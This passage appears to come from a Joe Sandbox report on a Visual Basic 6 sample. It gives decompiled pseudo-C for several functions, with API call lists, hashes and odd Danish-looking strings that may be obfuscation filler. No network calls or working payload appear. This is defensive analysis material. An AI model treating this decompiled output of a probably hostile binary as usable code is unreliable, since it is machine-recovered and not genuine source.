				_push(0xb5);
				_push(L"SKADESLSHOLDELSERNE");
				_push(L"Fritgaaende");
				_push(0);
				L00401690();
				if(_t37 == 0xa2) {
					_v60 = 0xfe;
					_v68 = 2;
					_v92 = L"Flskekdet";
					_v100 = 8;
					L0040184C();
					_push( &_v68);
					_push(0x48);
					_push( &_v52);
					_push( &_v84);
					L0040168A();
					_push( &_v84);
					L00401834();
					L0040183A();
					_push( &_v84);
					_push( &_v68);
					_push( &_v52);
					_push(3);
					L00401840();
					_push(0x4f);
					_push(0x9e);
					_push(0x14);
					_push( &_v52);
					L00401684();
					_t37 =  &_v52;
					_push(_t37);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"GILENO");
				L004017EC();
				_push(_t37);
				_push( &_v52);
				L0040167E();
				_t40 =  &_v52;
				_push(_t40);
				L00401834();
				L0040183A();
				L00401828();
				_push(0x41e983);
				L00401846();
				L00401846();
				return _t40;
			}




















      0x0041e81c
      0x0041e82b
      0x0041e835
      0x0041e83d
      0x0041e840
      0x0041e847
      0x0041e856
      0x0041e859
      0x0041e85c
      0x0041e85f
      0x0041e864
      0x0041e869
      0x0041e86e
      0x0041e870
      0x0041e87a
      0x0041e880
      0x0041e887
      0x0041e88e
      0x0041e895
      0x0041e8a2
      0x0041e8aa
      0x0041e8ab
      0x0041e8b0
      0x0041e8b4
      0x0041e8b5
      0x0041e8bd
      0x0041e8be
      0x0041e8c8
      0x0041e8d0
      0x0041e8d4
      0x0041e8d8
      0x0041e8d9
      0x0041e8db
      0x0041e8e3
      0x0041e8e5
      0x0041e8ea
      0x0041e8ef
      0x0041e8f0
      0x0041e8f5
      0x0041e8f8
      0x0041e8f9
      0x0041e903
      0x0041e90b
      0x0041e90b
      0x0041e910
      0x0041e915
      0x0041e91d
      0x0041e921
      0x0041e922
      0x0041e927
      0x0041e92a
      0x0041e92b
      0x0041e935
      0x0041e93d
      0x0041e942
      0x0041e975
      0x0041e97d
      0x0041e982

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E835
      • __vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E870
      • __vbaVarDup.MSVBVM60 ref: 0041E8A2
      • #629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041E8B5
      • __vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E8BE
      • __vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E8C8
      • __vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041E8DB
      • #539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E8F0
      • __vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E8F9
      • __vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E903
      • __vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E90B
      • #696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E915
      • #698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E922
      • __vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E92B
      • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E935
      • __vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E93D
      • __vbaFreeStr.MSVBVM60(0041E983,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E975
      • __vbaFreeStr.MSVBVM60(0041E983,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E97D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Move$Free$#539#629#696#698ChkstkList
      • String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
      • API String ID: 1195518721-3815085929
      • Opcode ID: de8e7e8414b592819e88513ebcb154d17dfe923622b925fda41d231dd5b5c214
      • Instruction ID: e20ab3016f0686051eb6c69e2b5022e5404bb230e2faeb86a52131f12a954692
      • Opcode Fuzzy Hash: de8e7e8414b592819e88513ebcb154d17dfe923622b925fda41d231dd5b5c214
      • Instruction Fuzzy Hash: 5431C972950258ABDB00FBD1DD86FEEB7B8AF04704F54442AB501BB1E1DB789A098B58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004207D7, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON
      Download Yara Rule
      C-Code - Quality: 28%
      			E004207D7(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				char* _t91;
				short _t93;
				short _t100;
				signed int _t106;
				signed int _t110;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t125 = _t124 - 0x18;
				 *[fs:0x0] = _t125;
				L00401540();
				_v28 = _t125;
				_v24 = 0x401470;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t122);
				_v8 = 1;
				_v8 = 2;
				if(0 != 0) {
					_v8 = 3;
					L004017AA();
					_v52 = __fp0;
					_v8 = 4;
					if( *0x4223c0 != 0) {
						_v256 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v256 = 0x4223c0;
					}
					_v220 =  *_v256;
					_t106 =  *((intOrPtr*)( *_v220 + 0x4c))(_v220,  &_v56);
					asm("fclex");
					_v224 = _t106;
					if(_v224 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x402598);
						_push(_v220);
						_push(_v224);
						L004017C8();
						_v260 = _t106;
					}
					_v228 = _v56;
					_t110 =  *((intOrPtr*)( *_v228 + 0x28))(_v228);
					asm("fclex");
					_v232 = _t110;
					if(_v232 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x402ed4);
						_push(_v228);
						_push(_v232);
						L004017C8();
						_v264 = _t110;
					}
					L004017C2();
				}
				_v8 = 6;
				_v64 = 0x637f55;
				_v72 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L0040161E();
				L0040183A();
				L00401828();
				_v8 = 7;
				_v64 = 0x1f1c50;
				_v72 = 3;
				_push( &_v72);
				_push( &_v88);
				L00401678();
				_v96 = 0xc1;
				_v104 = 2;
				_push( &_v104);
				_push(0xe7);
				_push( &_v88);
				_push( &_v120);
				L004015F4();
				_v128 = 0x1a6490;
				_v136 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t91 =  &_v136;
				_push(_t91);
				L004015EE();
				_v144 = _t91;
				_v152 = 0x8008;
				_push( &_v120);
				_t93 =  &_v152;
				_push(_t93);
				L00401660();
				_v220 = _t93;
				_push( &_v152);
				_push( &_v120);
				_push( &_v136);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(6);
				L00401840();
				_t100 = _v220;
				if(_t100 != 0) {
					_v8 = 8;
					_push(0xffffffff);
					L004016E4();
					_v8 = 9;
					_push(L"Cryptodeist");
					L004017B0();
					L0040183A();
				}
				_v8 = 0xb;
				_v40 = 0x85ca67;
				asm("wait");
				_push(0x420ab6);
				L00401846();
				L00401846();
				return _t100;
			}






































      0x004207da
      0x004207e9
      0x004207f5
      0x004207fd
      0x00420800
      0x00420807
      0x0042080e
      0x0042081d
      0x00420820
      0x00420827
      0x00420832
      0x00420838
      0x0042083f
      0x00420844
      0x00420847
      0x00420855
      0x00420872
      0x00420857
      0x00420857
      0x0042085c
      0x00420861
      0x00420866
      0x00420866
      0x00420884
      0x0042089c
      0x0042089f
      0x004208a1
      0x004208ae
      0x004208d0
      0x004208b0
      0x004208b0
      0x004208b2
      0x004208b7
      0x004208bd
      0x004208c3
      0x004208c8
      0x004208c8
      0x004208da
      0x004208ee
      0x004208f1
      0x004208f3
      0x00420900
      0x00420922
      0x00420902
      0x00420902
      0x00420904
      0x00420909
      0x0042090f
      0x00420915
      0x0042091a
      0x0042091a
      0x0042092c
      0x0042092c
      0x00420931
      0x00420938
      0x0042093f
      0x00420946
      0x00420948
      0x0042094a
      0x0042094c
      0x00420951
      0x00420952
      0x0042095c
      0x00420964
      0x00420969
      0x00420970
      0x00420977
      0x00420981
      0x00420985
      0x00420986
      0x0042098b
      0x00420992
      0x0042099c
      0x0042099d
      0x004209a5
      0x004209a9
      0x004209aa
      0x004209af
      0x004209b6
      0x004209c0
      0x004209c2
      0x004209c4
      0x004209c6
      0x004209c8
      0x004209ce
      0x004209cf
      0x004209d4
      0x004209da
      0x004209e7
      0x004209e8
      0x004209ee
      0x004209ef
      0x004209f4
      0x00420a01
      0x00420a05
      0x00420a0c
      0x00420a10
      0x00420a14
      0x00420a18
      0x00420a19
      0x00420a1b
      0x00420a23
      0x00420a2c
      0x00420a2e
      0x00420a35
      0x00420a37
      0x00420a3c
      0x00420a43
      0x00420a48
      0x00420a52
      0x00420a52
      0x00420a57
      0x00420a5e
      0x00420a65
      0x00420a66
      0x00420aa8
      0x00420ab0
      0x00420ab5

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 004207F5
      • #535.MSVBVM60(?,?,?,?,00401546), ref: 0042083F
      • __vbaNew2.MSVBVM60(004025A8,004223C0,?,?,?,?,00401546), ref: 00420861
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,0000004C), ref: 004208C3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402ED4,00000028), ref: 00420915
      • __vbaFreeObj.MSVBVM60(00000000,?,00402ED4,00000028), ref: 0042092C
      • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420952
      • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042095C
      • __vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420964
      • #613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420986
      • #632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004209AA
      • #704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 004209CF
      • __vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 004209EF
      • __vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420A1B
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420A37
      • #527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420A48
      • __vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420A52
      • __vbaFreeStr.MSVBVM60(00420AB6), ref: 00420AA8
      • __vbaFreeStr.MSVBVM60(00420AB6), ref: 00420AB0
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
      • String ID: Cryptodeist
      • API String ID: 3497234973-3010629389
      • Opcode ID: 1400d5d705c73209829f60782418585440e633853c73248a3f18207b67d4f438
      • Instruction ID: ee4229e00f793e4586635b4679c252d176b017c8f18ba1ca7a8ce431a98d0fdb
      • Opcode Fuzzy Hash: 1400d5d705c73209829f60782418585440e633853c73248a3f18207b67d4f438
      • Instruction Fuzzy Hash: 7C7118B1900218EFDB10DFA5CE45BDEB7B8AF04314F6082AAE115B71E1DB785A88CF54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041EC4C, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 81COMMON
      Download Yara Rule
      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EC68
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EC92
      • __vbaVarDup.MSVBVM60 ref: 0041ECB9
      • #607.MSVBVM60(?,000000BB,?), ref: 0041ECCB
      • __vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041ECD4
      • __vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041ECDE
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041ECED
      • #717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041ED0E
      • __vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ED17
      • __vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ED21
      • __vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ED29
      • __vbaFreeStr.MSVBVM60(0041ED6C,?,?,?,?,00401546), ref: 0041ED4B
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041ED6C,?,?,?,?,00401546), ref: 0041ED56
      • __vbaFreeStr.MSVBVM60(00000000,?,0041ED6C,?,?,?,?,00401546), ref: 0041ED5E
      • __vbaFreeStr.MSVBVM60(00000000,?,0041ED6C,?,?,?,?,00401546), ref: 0041ED66
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
      • String ID: lA
      • API String ID: 1752509113-2320377057
      • Opcode ID: 6bb5e773177f0d77e8b552b59b9e4cc8cff3dc98111633684aea49b18cb07535
      • Instruction ID: 617a26ba6d14a6f13399eb985fefbecc7ee5fca677ac642f6e29330661785bf3
      • Opcode Fuzzy Hash: 6bb5e773177f0d77e8b552b59b9e4cc8cff3dc98111633684aea49b18cb07535
      • Instruction Fuzzy Hash: B431FC76900249ABDB00FBD1D986BDEB7B9AF04304F50843AB501B71E1EB786B09CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420189, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95COMMON
      Download Yara Rule
      C-Code - Quality: 56%
      			E00420189(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				signed int _t39;
				signed int _t43;
				signed int _t49;
				intOrPtr _t66;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_t39 = 0x30;
				L00401540();
				_v12 = _t66;
				_v8 = 0x4013e0;
				L00401612();
				L0040183A();
				_push(_t39);
				_push(L"Skimmia");
				L0040172C();
				asm("sbb eax, eax");
				_v40 =  ~( ~_t39 + 1);
				L00401846();
				_t43 = _v40;
				if(_t43 != 0) {
					_push(0x47);
					L00401786();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v60 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v60 = 0x4223c0;
					}
					_v40 =  *_v60;
					_t49 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
					asm("fclex");
					_v44 = _t49;
					if(_v44 >= 0) {
						_v64 = _v64 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v40);
						_push(_v44);
						L004017C8();
						_v64 = _t49;
					}
					_v48 = _v36;
					_t43 =  *((intOrPtr*)( *_v48 + 0x138))(_v48, L"Printermanualen", 1);
					asm("fclex");
					_v52 = _t43;
					if(_v52 >= 0) {
						_v68 = _v68 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x4025b8);
						_push(_v48);
						_push(_v52);
						L004017C8();
						_v68 = _t43;
					}
					L004017C2();
				}
				_v24 = 0x5a4c00;
				_push(0x4202d9);
				L00401846();
				return _t43;
			}




















      0x0042018e
      0x00420199
      0x0042019a
      0x004201a3
      0x004201a4
      0x004201ac
      0x004201af
      0x004201b6
      0x004201c0
      0x004201c5
      0x004201c6
      0x004201cb
      0x004201d2
      0x004201d7
      0x004201de
      0x004201e3
      0x004201e9
      0x004201ef
      0x004201f1
      0x004201fb
      0x00420207
      0x00420221
      0x00420209
      0x00420209
      0x0042020e
      0x00420213
      0x00420218
      0x00420218
      0x0042022d
      0x0042023c
      0x0042023f
      0x00420241
      0x00420248
      0x00420261
      0x0042024a
      0x0042024a
      0x0042024c
      0x00420251
      0x00420254
      0x00420257
      0x0042025c
      0x0042025c
      0x00420268
      0x0042027a
      0x00420280
      0x00420282
      0x00420289
      0x004202a5
      0x0042028b
      0x0042028b
      0x00420290
      0x00420295
      0x00420298
      0x0042029b
      0x004202a0
      0x004202a0
      0x004202ac
      0x004202ac
      0x004202b1
      0x004202b8
      0x004202d3
      0x004202d8

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 004201A4
      • #669.MSVBVM60(?,?,?,?,00401546), ref: 004201B6
      • __vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 004201C0
      • __vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 004201CB
      • __vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 004201DE
      • #537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201F1
      • __vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201FB
      • __vbaNew2.MSVBVM60(004025A8,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420213
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420257
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042029B
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004202AC
      • __vbaFreeStr.MSVBVM60(004202D9,Skimmia,00000000,?,?,?,?,00401546), ref: 004202D3
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
      • String ID: Printermanualen$Skimmia
      • API String ID: 2004920347-2169568590
      • Opcode ID: 8a83ce54c23753886b484e18bf6738465049b04d776a819aad34dfcf1e93d093
      • Instruction ID: 3add37628f255d130b939865cf1e4d5ac625ead0c57573e025399e5884ebc4ce
      • Opcode Fuzzy Hash: 8a83ce54c23753886b484e18bf6738465049b04d776a819aad34dfcf1e93d093
      • Instruction Fuzzy Hash: 07310E71A50218EFDB00DBA5D945BEDBBF4BF18704F50446BF401B71E1DBB859018B69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041FA79, Relevance: 16.5, APIs: 11, Instructions: 47COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E0041FA79(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _t24;
				void* _t38;
				void* _t40;
				intOrPtr _t41;

				_t41 = _t40 - 0xc;
				 *[fs:0x0] = _t41;
				L00401540();
				_v16 = _t41;
				_v12 = 0x4013c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401546, _t38);
				L004017B6();
				L004017B6();
				_push( &_v52);
				L00401636();
				_t24 =  &_v52;
				_push(_t24);
				L00401834();
				L0040183A();
				L00401828();
				L00401630();
				_push(0x41fb21);
				L00401846();
				L00401846();
				L00401846();
				return _t24;
			}














      0x0041fa7c
      0x0041fa8b
      0x0041fa95
      0x0041fa9d
      0x0041faa0
      0x0041faa7
      0x0041fab6
      0x0041fabf
      0x0041faca
      0x0041fad2
      0x0041fad3
      0x0041fad8
      0x0041fadb
      0x0041fadc
      0x0041fae6
      0x0041faee
      0x0041faf3
      0x0041faf8
      0x0041fb0b
      0x0041fb13
      0x0041fb1b
      0x0041fb20

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041FA95
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FABF
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FACA
      • #612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FAD3
      • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FADC
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FAE6
      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FAEE
      • #554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FAF3
      • __vbaFreeStr.MSVBVM60(0041FB21,?,?,?,?,?,?,00401546), ref: 0041FB0B
      • __vbaFreeStr.MSVBVM60(0041FB21,?,?,?,?,?,?,00401546), ref: 0041FB13
      • __vbaFreeStr.MSVBVM60(0041FB21,?,?,?,?,?,?,00401546), ref: 0041FB1B
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$CopyMove$#554#612Chkstk
      • String ID:
      • API String ID: 3453574145-0
      • Opcode ID: a483aca60a33dfcfcf349c2dc41a12afd64e35e3ff551156b81b5015813b7e07
      • Instruction ID: b5597fc6caa8cba16311d7879ef40581af0acc1f27b765139793a092a6425d50
      • Opcode Fuzzy Hash: a483aca60a33dfcfcf349c2dc41a12afd64e35e3ff551156b81b5015813b7e07
      • Instruction Fuzzy Hash: 8111FE31900149ABCB00FFA1C896EDE7774AF04708F50853AB501771E1EB3CAA05CB98
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420ED7, Relevance: 13.6, APIs: 9, Instructions: 53COMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E00420ED7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				char _v52;
				char _v68;
				char* _t29;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L00401540();
				_v16 = _t42;
				_v12 = 0x4014d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401546, _t39);
				L004017B6();
				_push(0x5745);
				_push( &_v52);
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L004015E2();
				_push( &_v68);
				L00401834();
				L0040183A();
				_push( &_v68);
				_t29 =  &_v52;
				_push(_t29);
				_push(2);
				L00401840();
				_v36 = 0x253;
				_push(0x420f93);
				L00401846();
				L00401846();
				return _t29;
			}















      0x00420eda
      0x00420ee9
      0x00420ef3
      0x00420efb
      0x00420efe
      0x00420f05
      0x00420f14
      0x00420f1d
      0x00420f22
      0x00420f2a
      0x00420f2b
      0x00420f33
      0x00420f37
      0x00420f38
      0x00420f40
      0x00420f41
      0x00420f4b
      0x00420f53
      0x00420f54
      0x00420f57
      0x00420f58
      0x00420f5a
      0x00420f62
      0x00420f68
      0x00420f85
      0x00420f8d
      0x00420f92

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420EF3
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F1D
      • #698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 00420F2B
      • #520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 00420F38
      • __vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420F41
      • __vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420F4B
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420F5A
      • __vbaFreeStr.MSVBVM60(00420F93), ref: 00420F85
      • __vbaFreeStr.MSVBVM60(00420F93), ref: 00420F8D
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$#520#698ChkstkCopyList
      • String ID:
      • API String ID: 415313431-0
      • Opcode ID: f565266add9b891c8e2d12e9b92e11c994762066b819355f8d85318489caba32
      • Instruction ID: d39df1d89109fdbd2358585aba827fa4e42b2391c4dcebdb4245946499878d0a
      • Opcode Fuzzy Hash: f565266add9b891c8e2d12e9b92e11c994762066b819355f8d85318489caba32
      • Instruction Fuzzy Hash: 6311D071D00218ABCB00FB91DD86EEEB7BCBF44748F54843AF501A71A1EB789605CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F3B1, Relevance: 13.6, APIs: 9, Instructions: 50COMMON
      Download Yara Rule
      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F3CD
      • #707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F3F5
      • __vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F3FF
      • #593.MSVBVM60(0000000A), ref: 0041F41C
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041F427
      • #537.MSVBVM60(0000003B,0000000A), ref: 0041F42E
      • __vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F438
      • __vbaFreeStr.MSVBVM60(0041F45F,0000000C,00000000,?,?,?,?,00401546), ref: 0041F451
      • __vbaFreeStr.MSVBVM60(0041F45F,0000000C,00000000,?,?,?,?,00401546), ref: 0041F459
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
